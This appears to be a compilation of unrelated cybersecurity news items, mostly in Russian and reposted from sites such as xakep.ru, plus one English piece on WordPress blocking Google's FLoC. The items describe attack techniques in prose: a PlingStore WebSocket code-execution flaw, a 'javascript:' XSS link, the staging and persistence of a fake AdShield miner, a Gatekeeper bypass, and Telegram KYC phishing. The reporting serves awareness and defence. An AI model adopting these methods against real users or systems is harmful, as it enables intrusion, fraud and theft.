Кроме того, выявлена уязвимость в приложении PlingStore, написанном с использованием платформы Electron и позволяющем производить навигацию по каталогам OpenDesktop без браузера и устанавливать представленные там пакеты. Уязвимость в PlingStore позволяет выполнить свой код в системе пользователя. Во время работы приложения PlingStore дополнительно запускается процесс ocs- manager, принимающий локальные соединения через WebSocket и выполняющий команды, такие как загрузка и запуск приложений в формате AppImage. Подразумевается, что команды передаёт приложение PlingStore, но на деле из-за отсутствия аутентификации запрос к ocs-manager можно отправить и из браузера пользователя. В случае открытия пользователем вредоносного сайта, он может инициировать соединение с ocs-manager и добиться выполнения кода на системе пользователя.
Так же сообщается об XSS-уязвимости в каталоге extensions.gnome.org - в поле с URL домашней страницы дополнения можно указать JavaScript-код в форме "javascript: код" и при клике на ссылке вместо открытия сайта проекта будет запущен указанный JavaScript. С одной стороны, проблема носит больше умозрительный характер, так как размещение в каталоге extensions.gnome.org проходит премодерацию и для атаки требуется не только открытие определённой страницы, но и явный клик по ссылке. С другой стороны, не исключено, что во время проверки модератор пожелает перейти на сайт проекта, не обратит внимание на форму ссылки и запустит JavaScript-код в контексте своей учётной записи.
WordPress announced today that they are treating Google's new FLoC tracking technology as a security concern and may block it by default on WordPress sites.
For some time, browsers have begun to increasingly block third-party browser
cookies [1, 2, 3] used by advertisers for interest-based advertising.
In response, Google introduced a new ad tracking technology called Federated
Learning of Cohorts, or FLoC, that uses a web browser to anonymously place
users into interest or behavioral buckets based on how they browse the web.
After Google began testing FLoC this month in Google Chrome, there has been a
consensus among privacy advocates that Google's FLoC implementation just
replaces one privacy risk with another one.
"FLoC is meant to be a new way to make your browser do the profiling that third-party trackers used to do themselves: in this case, boiling down your recent browsing activity into a behavioral label, and then sharing it with websites and advertisers."
"The technology will avoid the privacy risks of third-party cookies, but it will create new ones in the process. It may also exacerbate many of the worst non-privacy problems with behavioral ads, including discrimination and predatory targeting," the Electronic Frontier Foundation (EFF) explained in a recent [blog post](https://www.eff.org/deeplinks/2021/03/googles-floc- terrible-idea).
Since then, other privacy browser and search engine developers, such as Brave Browser, DuckDuckGo, and Vivaldi, have all removed FLoC from their software or created tools to block it.
In a new announcement today, WordPress states that they consider Google's FLoC technology a security concern and they propose blocking the technology in future versions of the blogging software.
"WordPress powers approximately 41% of the web – and this community can help combat racism, sexism, anti-LGBTQ+ discrimination and discrimination against those with mental illness with four lines of code," says [WordPress](https://make.wordpress.org/core/2021/04/18/proposal-treat-floc-as- a-security-concern/).
Wordpress plans to disable FLoC using the following four lines of code, which will cause the blogging platform to issue a HTTP request header tells the browser that FLoC should be disabled for the site.
function disable_floc($headers) {
$headers['Permissions-Policy'] = 'interest-cohort=()';
return $headers;
}
add_filter('wp_headers', 'disable_floc');
WordPress explains that though some admins will likely want to enable this
technology, those admins probably have the tech know-how to override the above
code. WordPress also indicated that they might add a setting that allows
admins to control whether FLoC is permitted.
However, WordPress's concern is that those unaware of this new tracking technology will automatically opt into it without fully understanding what it entails. Therefore, it is in these users' best interest for WordPress to automatically disable the technology.
"When balancing the stakeholder interests, the needs of website administrators who are not even aware that this is something that they need to mitigate – and the interests of the users and visitors to those sites, is simply more compelling," WordPress explains.
WordPress states that this block is planned for WordPress 5.8, scheduled for release in July 2021, but is requesting feedback before implementing the proposed change.
As FLoC is expected to roll out sooner, WordPress is considering back-porting this code to earlier versions to "amplify the impact" on current versions of the blogging platform.
Update 04/19/21 06:10 AM EST: Further clarified that this is a proposal.
Сингапурская криптовалютная платформа Crypto.com объявила о временной приостановке вывода средств.
Представители платформы сослались на подозрительную активность, угрожающую безопасности активов клиентов. Платформа опубликовала объявление в Твиттере, заявив, что есть пользователи, которые выразили обеспокоенность по поводу фактов несанкционированного списания средств.
We have a small number of users reporting suspicious activity on their accounts. We will be pausing withdrawals shortly, as our team is investigating. All funds are safe. — Crypto.com (@cryptocom) January 17, 2022
Click to expand...
«У нас есть небольшое количество пользователей, сообщающих о подозрительной активности в своих аккаунтах. Мы приостановим вывод средств, так как наша команда проводит расследование. Все средства в безопасности», — говорится в сообщении Crypto.com.
Часть пользователей Crypto.com сообщила, что потеряла свои средства в результате многократного несанкционированного снятия криптовалюты. При этом адреса мошенников не вносились биржей в «черный список», а двухфакторная аутентификация не стала препятствием для кражи.
Некоторые пользователи обвинили платформу в продаже их криптоактивов прямо со счетов по несуществующим заявкам. На вырученные средства злоумышленники на этой же площадке купили NFT, полагают пользователи.
Клиенты биржи считают, что Crypto.com скрывает реальные масштабы потерь.
«Несколько часов назад я написал вам [Crypto.com], что с моей учетной записи украли 4.28 ETH и мне интересно, как они прошли двухфакторную аутентификацию? Это дикость. После того, как 4.28 ETH были сняты с моего @cryptocom кошелька, я начал проверять их кошелек ETH. За последние шесть часов его вычистили примерно на 5000 ETH! Так что это не просто небольшое количество пользователей. Это $16 млн», — написал в Твиттере пользователь под ником BEN BALLER.
Команда Crypto.com отметила, что расследуют причину проблемы, но не сообщила, когда возобновится нормальная работа платформы.
Компания Apple выпустила macOS Big Sur 11.3, где исправлена уязвимость, которой уже злоупотребляли хакеры. Баг позволял малвари обойти защиту Gatekeeper, Apple File Quarantine и процесс нотаризации (notarization).
Уязвимость CVE-2021-30657 была обнаружена ИБ-специалистом Седриком Оуэнсом (Cedric Owens). В блоге исследователь пишет, что обнаружил новый метод упаковки неподписанных приложений для macOS, который заставляет Gatekeeper считать, что приложение нотаризовано и подписано. То есть приложение потенциального атакующего может работать без каких-либо предупреждений о его небезопасности.
Также Оуэнс попросил известного специалиста в области безопасности macOS Патрика Уордла проверить свои выводы. В собственном блоге Уордл сообщает, что Оуэнс полностью прав, а также отмечает, что обнаружил образцы малвари, которые использовали эту уязвимость для распространения. Об этом же пишут и эксперты компании Jamf Protect.
По данным специалистов, уязвимость с января 2021 года эксплуатировали разработчики малвари Shlayer, и Уордл отмечает, что это худшая уязвимость в macOS за последнее время, а Shlayer — весьма продвинутая вредоносная кампания.
Напомню, что, по данным «Лаборатории Касперского», Shlayer уже два года является самой распространенной угрозой для macOS: в 2019 году каждый десятый пользователь защитных решений компании сталкивался с этой малварью хотя бы раз, а его доля по отношению ко всем детектам на данной ОС составляет практически 30%.
Первые экземпляры семейства Shlayer попали в руки исследователей еще в феврале 2018 года, и в начале 2020 года было собрано почти 32 000 различных вредоносных образцов трояна, а также выявлено 143 домена управляющих серверов.
Чаще всего трояны семейства Shlayer загружают и устанавливают на устройства пользователей различные рекламные приложения. Кроме того, их функциональность теоретически позволяет скачивать программы, которые не просто заваливают пользователей рекламой, но и самопроизвольно открывают рекламные страницы в браузерах и подменяют результаты поиска, чтобы загружать еще больше рекламных сообщений.
Также стоит помнить о том, что хакеры могут в любой момент переключиться на более опасные пейлоады, такие как программы-вымогатели или вайперы.
• Source: <https://cedowens.medium.com/macos-gatekeeper- bypass-2021-edition-5256a2955508>
• Source: <https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper- bypass-on-macos>
В 2020 году европейские правоохранители ликвидировали платформу для зашифрованных коммуникаций Encrochat, которой пользовались более 60 000 преступников по всему миру.
Напомню, что телефоны Encrochat гарантировали своим пользователям абсолютную анонимность, так как не имели привязки устройства или SIM-карты к учетной записи клиента и приобретались в условиях, гарантирующих невозможность отследить их происхождение. Также гарантировалась полная конфиденциальность: зашифрованный интерфейс был надежно скрыт, а само устройство модифицировано — физически отсутствовали камера, микрофон, GPS-модуль и USB-порт.
Такие девайсы поставлялись сразу с двумя ОС: если пользователь хотел, чтобы устройство выглядело безобидным, он загружал обычный Android. Если же нужно было использовать секретные чаты, пользователь переключался на систему Encrochat. По данным СМИ, телефоны Encrochat были построены на базе модифицированных BQ Aquaris X2 — Android-смартфонах, выпущенных в 2018 году испанской компанией по производству электроники.
Операторы платформы Encrochat устанавливали на телефоны собственные зашифрованные программы для обмена сообщениями и VoIP-звонков, которые маршрутизировали трафик через собственные серверы компании. Также телефоны имели функцию быстрого и полного обнуления устройства, если пользователь вводил специальный PIN-код.
Компания продавала эти телефоны по подписке: шестимесячный контракт стоил около 1500 фунтов стерлингов.
В итоге эта операция привела к аресту 746 человек, изъятию 54 000 000 фунтов стерлингов наличными (67,4 миллиона долларов), 77 единиц огнестрельного оружия (автоматы, пистолеты, четыре гранаты и более 1800 патронов), 55 дорогостоящих автомобилей и более двух тонн наркотиков.
Только в Нидерландах закрытие Encrochat позволило провести множество арестов, ликвидировать 19 лабораторий по производству метамфетамина, изъять 1200 килограммов метамфетамина и более 10 тонн кокаина. Также правоохранители обнаружили в деревне, недалеко от границы с Бельгией, жуткие грузовые контейнеры, переделанные под тюрьмы и камеры пыток (со звукоизоляцией, стоматологическим креслом, наручниками, скальпелями и другими инструментами).
Как теперь сообщает издание Vice Motherboard, в распоряжении которого оказались документы, составленные сотрудниками правоохранительных органов, в телефонах Encrochat, в приложении для обмена зашифрованными сообщениями, использовался протокол Signal.
«EncroChat шифрует свои сообщения с помощью протокола Signal. Это широко используемый протокол шифрования, который можно найти в свободном доступе. Я не знаю о какой-либо возможности расшифровывать сообщения, зашифрованные с использованием протокола Signal», — писал сотрудник британского Национального агентства по борьбе с преступностью.
Click to expand...

Хотя многие знают Signal как бесплатное приложение для обмена зашифрованными сообщениями, организация, стоящая за этим приложением, давно открыла библиотеки своего криптографического протокола для всех. В результате такие компании, как WhatsApp, тоже используют этот протокол в своих продуктах.
При этом нужно отметить, что операция правоохранителей по ликвидации Encrochat не была связана с небезопасностью самого приложения или протокола Signal. Дело в том, что в прошлом году французская полиция сумела внедрить малварь на устройства Encrochat и добралась до содержимого сообщений пользователей именно таким образом.
Интересно, что представители Signal и Национального агентства по борьбе с преступностью отказались хоть как-то прокомментировать находку журналистов.
Источник: xakep.ru/2021/03/25/encrochat-signal/
Три уязвимости устранены в подсистеме iSCSI ядра Linux. Они позволяли злоумышленнику с базовыми пользовательскими привилегиями получить привилегии root. К счастью, эти баги можно эксплуатировать только локально, то есть атакующему придется сначала получить доступ к устройству каким-то иным способом.
Уязвимости могут привести к локальному повышению привилегий, утечкам информации и отказам в обслуживании:
[](https://xakep.ru/wp- content/uploads/2021/03/343187/vuln.png)
Проблемы обнаружил исследователь GRIMM Адам Николс (Adam Nichols), и он [сообщает](https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux- kernel.html), что баги появились в коде еще 15 лет назад, в 2006 году, на начальных этапах разработки iSCSI. Теперь же проблемы затрагивают все дистрибутивы Linux, и хотя уязвимый модуль scsi_transport_iscsi не загружается по умолчанию, все не так просто.
«Ядро Linux загружает модули либо потому, что обнаружено новое оборудование, либо потому, что функция ядра обнаруживает отсутствие модуля. В последнем случае неявная автозагрузка с большей вероятностью может быть использована и легко запущена злоумышленником, что позволит ему увеличить поверхность атаки, — предупреждает эксперт. — В системах CentOS 8, RHEL 8 и Fedora непривилегированные пользователи могут автоматически загружать необходимые модули, если установлен пакет rdma-core. В системах Debian и Ubuntu пакет rdma-core будет автоматически загружать только два необходимых модуля ядра, если доступно оборудование RDMA».
Click to expand...
[](https://xakep.ru/wp- content/uploads/2021/03/343187/Impact-flowchart.png)
В итоге атакующие имеют возможность злоупотребить найденными уязвимостями, чтобы обойти такие защитные механизмы, как Kernel Address Space Layout Randomization (KASLR), Supervisor Mode Execution Protection (SMEP), Supervisor Mode Access Prevention (SMAP), а также Kernel Page-Table Isolation (KPTI).
Уязвимости были устранены в версиях 5.11.4, 5.10.21, 5.4.103, 4.19.179, 4.14.224, 4.9.260 и 4.4.260, и исправления стали доступны 7 марта 2021 года. Сообщается, что патчи для неподдерживаемых EOL-версий ядра, таких как 3.x и 2.6.23, выпускаться не будут.
Источник: xakep.ru/2021/03/16/old-iscsi-problems/
Исследователи «Лаборатории Касперского» [рассказали](https://securelist.ru/ad- blocker-with-miner-included/100732/), что недавно обнаружили ряд поддельных приложений, распространяющие майнер криптовалюты Monero.
По мнению экспертов, эта продолжение прошлогодней кампании, о которой [предупреждала](https://blog.avast.com/fake-malwarebytes-installation-files- distributing-coinminer) компания Avast. Летом 2020 года злоумышленники распространяли малварь под видом установщика антивируса Malwarebytes. Теперь же малварь маскируется под популярные блокировщики рекламы AdShield и Netshield, а также под сервис OpenDNS.
С начала февраля 2021 года фейковые приложения пытались установить более 7 000 человек. На пике кампании атаке подвергались более 2500 уникальных пользователей в день, преимущественно из России и стран СНГ.
[](https://xakep.ru/wp- content/uploads/2021/03/342769/01-en-ru-fake-adshield-miner-diagram.png)
Аналитики пишут, что малварь распространяется под именем adshield[.]pro и обычно выдает себя за Windows-версию мобильного блокировщика рекламы AdShield. После того как пользователь запускает программу, та меняет настройки DNS на устройстве таким образом, чтобы все домены разрешались через серверы хакеров, которые, в свою очередь, не дают пользователям получить доступ к сайтам некоторых антивирусов, например к Malwarebytes.com.
После подмены DNS вредонос начинает обновляться и запускает updater.exe с аргументом self-upgrade («C:\Program Files (x86)\AdShield\updater.exe» -self- upgrade). Updater.exe обращается к управляющему серверу преступников, отправляет им сведения о зараженной машине и информацию о начале установки.
Затем все тот же Updater.exe загружает с сайта transmissionbt[.]org и запускает модифицированный торрент-клиент Transmission (оригинальный дистрибутив можно найти по адресу transmissionbt.com). Модифицированная программа отсылает на командный сервер информацию об установке вместе с идентификатором зараженной машины, а затем загружает модуль для майнинга.
Этот модуль состоит из легитимных вспомогательных библиотек, зашифрованного файла с майнером data.pak, исполняемого файла flock.exe и файла «лицензии» lic.data. Последний содержит шестнадцатеричный хэш SHA-256 от некоторых параметров атакованной машины и данных из файла data.pak.
Фальшивый клиент Transmission запускает flock.exe, который первым делом вычисляет хэш от параметров зараженного компьютера и данных из файла data.pak, после чего сравнивает его с хэшем из файла lic.data. Дело в том, что управляющий центр генерирует для каждой машины уникальный набор файлов, чтобы затруднить статическое детектирование и предотвратить запуск майнера в различных виртуальных окружениях, предназначенных для анализа. Поэтому если хэши различаются, выполнение прекращается.
Если же все в порядке, flock.exe расшифровывает данные из файла data.pak с помощью алгоритма AES-128-CTR, причем ключ для расшифровки и вектор инициализации собираются из нескольких частей, хранящихся в коде образца. После расшифровки получается файл бинарных ресурсов Qt, в котором находятся два исполняемых файла — опенсорсный майнер XMRig (такой же использовался и в летней атаке) и библиотека bxsdk64.dll. Файл bxsdk64.dll в данном случае используется для запуска майнера под видом легитимного приложения find.exe.
[](https://xakep.ru/wp- content/uploads/2021/03/342769/adshield_miner_03.png)
Расшифрованный data.pak
Для обеспечения постоянной работы майнера в планировщике Windows создается задача servicecheck_XX, где XX — случайные цифры. Задача запускает flock.exe с аргументом minimize.
Источник: xakep.ru/2021/03/12/fake-adshield/
Команда исследователей из Швейцарии заявила, что с помощью AI полностью преодолела систему защиты reCAPTCHAv2. Это первый случай на 100% предыдущте были не выше 71%. Использовалась модели YOLO v8 для сегментации и классификации. Особо интересно, это процесс использования данных cookie и истории браузера.
Ссылка на новость https://habr.com/ru/news/846814/
У пользователей Telegram воруют криптовалюты с помощью фишинговых ботов
Эксперты «Лаборатории Касперского» раскрыли схему кражи криптовалютных активов, нацеленную на русскоязычных пользователей мессенджера Telegram. Как правило, среди жертв оказываются люди, совершающих P2P-сделки внутри приложения.
Киберпреступники выходят на тех, кто ищет возможность для осуществления таких сделок под предлогом совершения транзакции. В начале беседы они предупреждают пользователя о необходимости пройти KYC-верификацию для повышения уровня безопасности и соблюдения требований регуляторов. После согласия жертвы ей присылают ссылку на сервис авторизации, который на самом деле является фишинговым ботом с логичным названием, например, Wallet KYC.
Уже в нем пользователя просят авторизоваться через свой аккаунт в Telegram, для чего якобы необходимо отключить двухфакторную аутентификацию и подтвердить это, нажав соответствующую кнопку. Затем владелец криптовалюты отправляет мошенникам код от самого мессенджера, а аккаунт переходит под полный контроль преступников, которые еще и получают доступ к криптовалютному кошельку Telegram Wallet.
"Для убедительности злоумышленники нередко ссылаются на требования законодательства — настоящие и выдуманные. Пользователям следует перепроверять информацию, прежде чем реагировать на предложение собеседника. К тому же, в любом случае, вне зависимости от легенды, человека должна насторожить просьба отключить двухфакторную аутентификацию и сообщить одноразовый код для авторизации — это явный признак мошенничества", — прокомментировала схему старший контент-аналитик «Лаборатории Касперского» Ольга Свистунова.
Издание Top10VPN, занимающееся рецензированием и проверкой VPN-сервисов, [провело](https://www.top10vpn.com/research/free-vpn-investigations/android- vpn-security-flaws/) тестирование 100 самых популярных бесплатных VPN-приложений для платформы Android, суммарно насчитывающих более 2.5 миллиарда установок (для проверки были взяты 100 бесплатных VPN-приложений, для которых в каталоге Google Play зафиксировано наибольшее число загрузок). Основные выводы:
• 88 из протестированных программ имеют те или иные проблемы, приводящие к утечке информации. В 83 приложениях утечки происходили из-за обращения к сторонним DNS-серверам (не серверам VPN-провайдера), например в 40 случаях использовался DNS Google, а в 14 - Cloudflare. В 79 приложениях не была исключена возможность отправки трафика в обход VPN. В 17 приложениях выявлено сразу несколько типов утечек (раскрытие сайтам исходных IPv4 и IPv6 пользователя, утечки через DNS и WebRTC).
• В 11 приложениях выявлено использование устаревших генераторов псевдослучайных чисел. В одном из приложений вообще не использовалось шифрование трафика. В 35 приложениях использовались неактуальные криптоалгоритмы (только в 20 программах применялись надёжные методы хэширования). В 23 приложениях на стадии создании VPN-туннеля для обращения к внешнему серверу допускалось использование старых версий TLS (старее TLSv3), а в 6 приложениях использовали SSLv2.
• В 69 программах запрашивались избыточные полномочия, например, 20 приложений требовали доступа к данным о местоположении (ACCESS_*_LOCATION), 46 - к списку установленных программ (QUERY_ALL_PACKAGES), 9 - доступ к состоянию телефона (READ_PHONE_STATE, среди прочего позволяет узнать IMEI и IMSI), 82 - запрашивали уникальные идентификаторы для идентификации в рекламных сетях (ACCESS_ADVERTISEMENTS_ID), 10 - пытались получить доступ к камере.
• В 53 приложениях выявлено использование сторонних проприетарных функций, например, 13 программ использовало код для отслеживания местоположения, 31 - для получения идентификаторов для рекламных сетей, 22 - для проверки других установленных приложений. 80 программ использовали сторонние библиотеки, среди которых 15 использовали библиотеки компаний Bytedance (TikTok), а 11 - библиотеки Yandex.
• 84 приложения включали компоненты SDK от маркетинговых платформ или социальных сетей, при этом 16 приложений включало 10 и более подобных компонентов.
• В 32 приложениях выявлено обращение к аппаратным возможностям и датчикам, которые могут привести к нарушению конфиденциальности. Например, 15 приложений обращаются к камере, 7 - к микрофону, а 14 к механизмам определения местоположения, таким как GPS, 14 к датчикам (гироскоп, датчик приближения и т.п.).
• 71 приложение отправляло персональные данные в сторонние сервисы, такие как Facebook (47), Yandex (13) и VK (11). 37 программ раскрывали сторонним сервисам идентификаторы устройств, 23 - IP-адреса, 61 - уникальные идентификаторы для отслеживания. 19 приложений отправляли телеметрию с информацией об устройстве и системе на серверы VPN-провайдера, а 56 - в сторонние сервисы, такие как Google (39), Facebook (17) и Yandex (9).
• В 19 приложениях при проверке в сервисе VirusTotal, использующем более 70 антивирусов, было определено вредоносное ПО. В 18 приложениях выявлено подключение к доменам, а в 13 к IP-адресам, занесённым в чёрные списки вредоносных хостов и адресов.
• В 93 приложениях выявлено расхождение заявленных меток соблюдения конфиденциальности с фактическим состоянием. 75 приложений неверно информировали о методах сбора данных о пользователе, 64 - об отправке данных сторонним сервисам, 32 - об используемых методах обеспечения безопасности. Из 65 приложений с меткой "No Data Sharing" только 20 не допускали отправку данных сторонним сервисам, а из 32 приложений с меткой "No Data Collection" лишь два соответствовали связанным с ней требованиям.
[xakep.ru/2022/11/03/yanluowang-leak/](https://xakep.ru/2022/11/03/yanluowang- leak/)
ИБ-эксперты сообщают о взломе хакерской группы Yanluowang, которая [скомпрометировала компанию Cisco](https://xakep.ru/2022/08/11/yanluowang- cisco/) летом текущего года. По данным специалистов, в сеть утекли внутренние чаты группировки, показывающие, что Yanluowang состоит из русскоязычных участников.
Аналитики KELA пишут, что свежая утечка содержит чаты хак-группы, датированные январем-сентябрем 2022 года, все общение в которых происходило на русском языке. Это интересный нюанс, так как изначально многие полагали, что Yanluowang – китайская хак- группа. Впрочем, некоторое время назад это мнение стало меняться, так как в сентябре хакеров уже связали с Evil Corp.
Исследователи рассказывают, что в чатах можно найти разговоры участников группы, известных под никами saint, killanas, stealer. Считается, что saint возглавляет группировку, killanas занимается кодингом. **Причем по информации одних источников, уже удалось вычислить псевдонимы злоумышленников на различных хак-форумах, а по другим данным – членов Yanluowang уже сдоксили полностью, включая их реальные имена, аккаунты в социальных сетях и прочие подробности.
**
Вот что экспертам уже удалось найти среди «слитых» данных:
Помимо логов в сети можно найти даже скриншоты, содержащие исходный код процедуры дешифрования вымогателя Yanluowang.
По информации [Risky Business](https://riskybiznews.substack.com/p/risky-biz- news-internal-chats-for), эта утечка, похоже, стала следствием серьезного взлома. Неизвестные не только получили контроль над внутренним чат-сервером Matrix, которым пользовалась группировка, но и скомпрометировали «сайт для утечек» Yanluowang в даркнете. Именно посредством дефейса этого ресурса взломщики заявили о себе, опубликовав новую запись в блоге. Пост содержал ссылки на аккаунты в Telegram и Twitch, где были размещены ссылки на украденные логи чатов.
В настоящее время неясно, кто стоял за взломом, но существует несколько теорий, начиная от классических версий, что это был недовольный бывший участник группировки или неизвестный ИБ-специалист, и заканчивая экзотичной версией, что это была месть службы безопасности Cisco за произошедший в мае взлом.
Как бы то ни было, эксперты уверены, что после такой масштабной компрометации на операциях Yanluowang можно ставить крест, так как другие киберпреступники вряд ли захотят иметь дело со скомпрометированной группировкой, чья операционная безопасность под вопросом.
Операторы шифровальщика BlackCat (он же ALPHV) взяли на себя ответственность за взлом компании Creos Luxembourg, которая выступает оператором газопровода и электросетей в центральной Европе.
Компания Encevo, которая владеет Creos Luxembourg и является поставщиком энергии для пяти стран ЕС, [объявила на прошлой неделе](https://www.encevo.eu/wp-content/uploads/2022/07/2022-Communique-de- presse-Cyberattaque.pdf), что подверглась хакерской атаке между 22 и 23 июля. В результате этого инцидента клиентские порталы Encevo и Creos Luxembourg оказались недоступны, хотя задержек и перерывов в предоставлении услуг не возникло.
28 июля компания опубликовала [обновленную информацию ](https://www.encevo.eu/wp-content/uploads/2022/07/2022-Communique-de-presse- DATA-BREACH.pdf)о взломе, заявив, что согласно предварительным результатами расследования, злоумышленники похитили «некоторый объем данных» из систем, к которым получили доступ.
Сообщалось, что Encevo пока не может оценить масштабы последствий инцидента. В компании просили клиентов подождать до завершения расследования, после чего каждый из них должен получить персональное уведомление. Пока всем клиентам рекомендуется сбросить пароли для своих учетных записей, которые использовались для взаимодействия с сервисами Encevo и Creos Luxembourg. Кроме того, если эти пароли использовались и для других сайтов, там их тоже следует изменить.
В минувшие выходные на сайте BlackCat появилась публикация, посвященная взлому Creos Luxembourg, где хакеры угрожают опубликовать 180 000 украденных у компании файлов общим объемом 150 Гб. Согласно заявлению злоумышленников, в этот дамп вошли контракты, соглашения, паспорта, счета и электронные письма. Судя по всему, опубликовать информацию группировка планирует уже сегодня.
[](https://xakep.ru/wp- content/uploads/2022/08/397392/alphv-announce.jpg)
Напомню, что ИБ-специалисты [считают](https://xakep.ru/2022/02/07/alphv- connections/), что BlackCat – это лишь ребрендинг печально известной малвари BlackMatter/DarkSide. Особенно интересно, что «сменить вывеску» хакерам пришлось после [нашумевшей атаки](https://xakep.ru/2021/05/27/darkside-vs- colonial-pipeline/) на крупнейшего оператора трубопроводов в США, компанию Colonial Pipeline, так как этот инцидент спровоцировал перебои с поставками топлива и привлек к хакерам слишком много ненужного им внимания.
Похоже, произошедшее с Colonial Pipeline не научило хакеров ничему, так как ранее BlackCat уже брала на себя ответственность за атаки на немецкие компании [Oiltanking и Mabanaft](https://xakep.ru/2022/02/02/oiltanking-mabanaft- hack/), занимающиеся транспортировкой и хранением нефти и нефтепродуктов, а теперь жертвой группы вновь стал оператор трубопровода.
хакер.ру
зы:одни уже атаковали трубу, и к ничему хорошему это не привело. олени, имхо
Следователями Главного следственного управления ГУ МВД России по Иркутской области закончено расследование серии мошенничеств, в совершении которых обвиняется 25-летний мужчина. Сотрудниками отдела по расследованию преступлений, совершенных с использованием информационно-телекоммуникационных технологий, собраны доказательства того, что помимо жительницы Тулуна злоумышленник обманул еще 16 человек, дистанционно похитив у них свыше 480 тысяч рублей.
Ранее сообщалось, что 89-летняя пенсионерка отдала 90 тысяч рублей аферисту, представившемуся ее внуком, проживающим в Испании. Предполагаемого телефонного афериста оперативники обнаружили и задержали в Тайшетском районе.
Детально изучив его деятельность, следователи выяснили, что «испанский внук» причастен к серии мошенничеств и дистанционных краж. В основном в телефонном разговоре злоумышленник представлялся родственником, попавшим в беду – внуком или племянником. При этом зачастую он называл себя именем Андрей. В большинстве случаев жертвами его противоправных посягательств становились мужчины и женщины в возрасте от 60 до 90 лет. В случаях, когда потерпевшие в силу своего преклонного возраста и низких навыков использования современных технологий не могли сами перечислить ему деньги, он узнавал у них данные карт и пароли и через онлайн-кабинеты банков сам переводил их деньги на подконтрольные счета.
Также два раза он обманывал автомобилистов, выставляя объявления о продаже автомобилей на интернет-сайте. Уговорив собеседника перевести ему часть суммы задатком, «Андрей» переставал выходить на связь.
Материалы уголовных дел, возбужденных по признакам преступлений, предусмотренных статьями 158 «Кража» и 159 «Мошенничество» Уголовного кодекса Российской Федерации были соединены в одно производство. Собранные следствием материалы легли в основу обвинительного заключения, которое в настоящий момент утверждено прокурором и передано в Тайшетский городской суд для рассмотрения по существу.
• Video: «Испанский внук»
В полиции Закарпатья рассказывают, что 30-летний виноградовец, используя специальные программы, взламывал пароли к личным почтовым ящикам и получал доступ к письмам сотрудничества с криптобиржами.
Во время обыска в доме подозреваемого изъяли компьютерную технику, мобильный телефон и три жестких диска. Экспертиза позволит полиции определить масштабы ущерба от такой деятельности виноградовца.
Установлено, что хакер присвоил криптовалюту 150 жителей Закарпатья. Сейчас правоохранители устанавливают суммы незаконно присвоенных средств.
Следователи открыли производство по ч. 2 ст. 361 Уголовного кодекса Украины, то есть Несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи.
Специалисты Check Point [обнаружили](https://research.checkpoint.com/2021/new- wormable-android-malware-spreads-by-creating-auto-replies-to-messages-in- whatsapp/) в магазине Google Play новую малварь под названием FlixOnline, которая маскируется под официальное приложение Netflix и якобы позволяет пользователям просматривать контент стримингового сервиса.
За два месяца приложение FlixOnline было загружено примерно 500 раз, и в настоящее время инженеры Google уже удалили вредонос из официального каталоги приложений.
[](https://xakep.ru/wp- content/uploads/2021/04/345468/FlixOnline.jpg)
Аналитики рассказывают, что после установки вредоносная программа отслеживает уведомления пользователей в WhatsApp и от их имени отправляет автоматические ответы на входящие сообщения. Специальный текст для таких ответов загружается с удаленного сервера. Как правило, он содержит предложение двухмесячного бесплатного просмотра Netflix Premium из любой точки мира.
[](https://xakep.ru/wp- content/uploads/2021/04/345468/whatsapp-2.png)
Малварь запрашивает необходимое для работы разрешение
В случае успешной установки малварь позволяет злоумышленникам распространять вредоносное ПО, похищать информацию и данные учетных записей WhatsApp, а также распространять поддельные или вредоносные сообщения среди контактов и групп в WhatsApp. FlixOnline специально создан таким образом, чтобы распространяться между устройствами, и оснащен функциональностью червя. Малварь способна переходить с одного устройства на другое сразу после того, как пользователь Android кликнет на ссылку в сообщении.
«В данном случае злоумышленники использовали довольно новую технику атак, а также методику перехвата соединения с WhatsApp через захват уведомлений и возможность выполнения предопределенных действий “отклонить» или «ответить”. Тот факт, что вредоносное ПО удалось так легко замаскировать и, в конечном итоге, обойти защиту Play Store, вызывает серьезные опасения», — комментирует Василий Дягилев, глава представительства Check Point Software Technologies в России и СНГ.
Click to expand...
Источник: xakep.ru/2021/04/09/flixonline/
Мошенники смогли обманом заставить коллекционера, собирающего NFT-картинки с изображениями обезьян и мутантов, передать им свою коллекцию, которую они затем успешно продали более чем за полмиллиона долларов.
В понедельник, 1 февраля, пользователь Twitter, называющий себя larrylawliet (@iloveponzi), сообщил о потере своей коллекции и попросил помощи. По словам исследователя безопасности, специализирующегося на криптовалюте, злоумышленники, похоже, смогли заставить larrylawliet разрешить своему кошельку взаимодействовать с их кошельком. Этот вид мошенничества приобретает все большую популярность в криптомире, в особенности сейчас, когда NFT-искусство стоит тысячи, а то и миллионы долларов.
«Вероятно, это какое-то мошенническое dAPP (децентрализованное приложение – ред.), представляющее одобренную транзакцию в кошелек пользователя», – сообщил изданию Motherboard старший технический директор сервиса ZenGo Тал Беери (Tal Be’ery).
Беери изучил транзакции в блокчейне и выяснил, что larrylawliet предоставил доступ к своей NFT-коллекции децентрализованному приложению, которое, как он думал, должно было помочь ему продать NFT-картинки. Однако это оказалось вовсе не dAPP, а личный криптовалютный кошелек мошенников, успешно укравших всю его коллекцию.
По словам larrylawliet, его NFT были похищены в рамках резонансного взлома NFT-проекта Moshi Mochi. Так, 1 февраля в Twitter появилось сообщение от Moshi Mochi о взломе официального Discord-канала проекта. Злоумышленникам удалось присвоить себе канал и через него переадресовывать пользователей на поддельный сайт. Как сообщает Moshi Mochi, его пользователи в общей сложности лишились 35 эфиров.
Однако для larrylawliet взлом Discord-канала проекта оказался фатальным. Он купился на опубликованную на канале вредоносную ссылку, обещавшую возможность отчеканить финальный раунд NFT. Жертва нажала на ссылку, одобрила действие – и вся ее коллекция уплыла из-под носа.
Судя по записям блокчейна, злоумышленники похитили у larrylawliet семь NFT: один из Bored Ape Yacht Club, пять из Mutant Ape Yacht Club и один Doodle. Другие жертвы лишились четыре Doodle. Похищенные NFT затем были проданы всего за $700 тыс. (украденный у larrylawliet Bored Ape ушел за 100 эфиров – порядка $275 тыс.).
По словам larrylawliet, воры сильно занизили цену, и реальная стоимость награбленного составляет 1000 эфиров – порядка $2,7 млн. Он объяснил это желанием злоумышленников поскорее продать краденые NFT, пока они не были заблокированы администрацией торговой площадки OpenSea. Действительно, в настоящее время эти NFT «заморожены» на OpenSea.
Согласно записям блокчейна, 600 эфиров на сумму около $1,5 млн были переведены из кошелька мошенников на «миксер» Tornado Cash.
